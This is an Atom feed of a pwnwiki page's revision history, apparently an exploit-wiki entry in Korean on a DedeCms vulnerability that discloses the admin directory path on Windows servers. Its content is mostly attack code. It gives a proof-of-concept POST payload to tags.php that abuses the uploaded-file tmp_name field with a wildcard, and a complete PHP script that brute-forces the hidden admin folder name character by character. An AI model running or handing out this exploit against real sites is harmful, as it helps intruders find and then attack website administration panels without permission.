<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=DedeCms%E5%BE%8C%E5%8F%B0%E5%9C%B0%E5%9D%80%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E%2Fko</id>
	<title>DedeCms後台地址洩露漏洞/ko - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=DedeCms%E5%BE%8C%E5%8F%B0%E5%9C%B0%E5%9D%80%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E%2Fko"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=DedeCms%E5%BE%8C%E5%8F%B0%E5%9C%B0%E5%9D%80%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E/ko&amp;action=history"/>
	<updated>2026-04-09T22:09:34Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=DedeCms%E5%BE%8C%E5%8F%B0%E5%9C%B0%E5%9D%80%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E/ko&amp;diff=4475&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;DedeCms 백그라운드 주소 공개 취약성&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=DedeCms%E5%BE%8C%E5%8F%B0%E5%9C%B0%E5%9D%80%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E/ko&amp;diff=4475&amp;oldid=prev"/>
		<updated>2021-06-09T10:47:44Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;DedeCms 백그라운드 주소 공개 취약성&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages  /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 전제 조건 ==&lt;br /&gt;
&lt;br /&gt;
Windows 시스템 만&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://localhost/dedecms/tags.php&lt;br /&gt;
&lt;br /&gt;
post:&lt;br /&gt;
&lt;br /&gt;
dopost=save&amp;amp;_FILES[b4dboy][tmp_name]=./de&amp;lt;/images/admin_top_logo.gif&amp;amp;_FILES[b4dboy][name]=0&amp;amp;_FILES[b4dboy][size]=0&amp;amp;_FILES[b4dboy][type]=image/gif&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
$domain='http://localhost/dedecms/';&lt;br /&gt;
$url=$domain.'/index.php';&lt;br /&gt;
function post($url, $data, $cookie = '') {&lt;br /&gt;
    $options = array(&lt;br /&gt;
        CURLOPT_RETURNTRANSFER =&amp;gt; true,&lt;br /&gt;
        CURLOPT_HEADER =&amp;gt; true,&lt;br /&gt;
        CURLOPT_POST =&amp;gt; true,&lt;br /&gt;
        CURLOPT_SSL_VERIFYHOST =&amp;gt; false,&lt;br /&gt;
        CURLOPT_SSL_VERIFYHOST =&amp;gt; false,&lt;br /&gt;
        CURLOPT_COOKIE =&amp;gt; $cookie,&lt;br /&gt;
        CURLOPT_POSTFIELDS =&amp;gt; $data,&lt;br /&gt;
    );&lt;br /&gt;
    $ch = curl_init($url);&lt;br /&gt;
    curl_setopt_array($ch, $options);&lt;br /&gt;
    $result = curl_exec($ch);&lt;br /&gt;
    curl_close($ch);&lt;br /&gt;
    return $result;&lt;br /&gt;
}&lt;br /&gt;
$testlen=25;&lt;br /&gt;
$str=range('a','z');&lt;br /&gt;
$number=range(0,9,1);&lt;br /&gt;
$dic = array_merge($str, $number);&lt;br /&gt;
$n=true;&lt;br /&gt;
$nn=true;&lt;br /&gt;
$path='';&lt;br /&gt;
while($n){&lt;br /&gt;
    foreach($dic as $v){&lt;br /&gt;
        foreach($dic as $vv){&lt;br /&gt;
            #echo $v.$vv .'----';&lt;br /&gt;
            $post_data=&amp;quot;dopost=save&amp;amp;_FILES[b4dboy][tmp_name]=./$v$vv&amp;lt;/images/admin_top_logo.gif&amp;amp;_FILES[b4dboy][name]=0&amp;amp;_FILES[b4dboy][size]=0&amp;amp;_FILES[b4dboy][type]=image/gif&amp;quot;;&lt;br /&gt;
            $result=post($url,$post_data);&lt;br /&gt;
            if(strpos($result,'Upload filetype not allow !') === false){&lt;br /&gt;
                $path=$v.$vv;$n=false;break 2;&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
while($nn){&lt;br /&gt;
    foreach($dic as $vvv){&lt;br /&gt;
        $post_data=&amp;quot;dopost=save&amp;amp;_FILES[b4dboy][tmp_name]=./$path$vvv&amp;lt;/images/admin_top_logo.gif&amp;amp;_FILES[b4dboy][name]=0&amp;amp;_FILES[b4dboy][size]=0&amp;amp;_FILES[b4dboy][type]=image/gif&amp;quot;;&lt;br /&gt;
        $result=post($url,$post_data);&lt;br /&gt;
        if(strpos($result,'Upload filetype not allow !') === false){&lt;br /&gt;
            $path.=$vvv;&lt;br /&gt;
            echo $path . PHP_EOL;&lt;br /&gt;
            $giturl=$domain.'/'.$path.'/images/admin_top_logo.gif';&lt;br /&gt;
            if(@file_get_contents($giturl)){&lt;br /&gt;
                echo $domain.'/'.$path.'/';&lt;br /&gt;
                $nn=false;break 2;&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>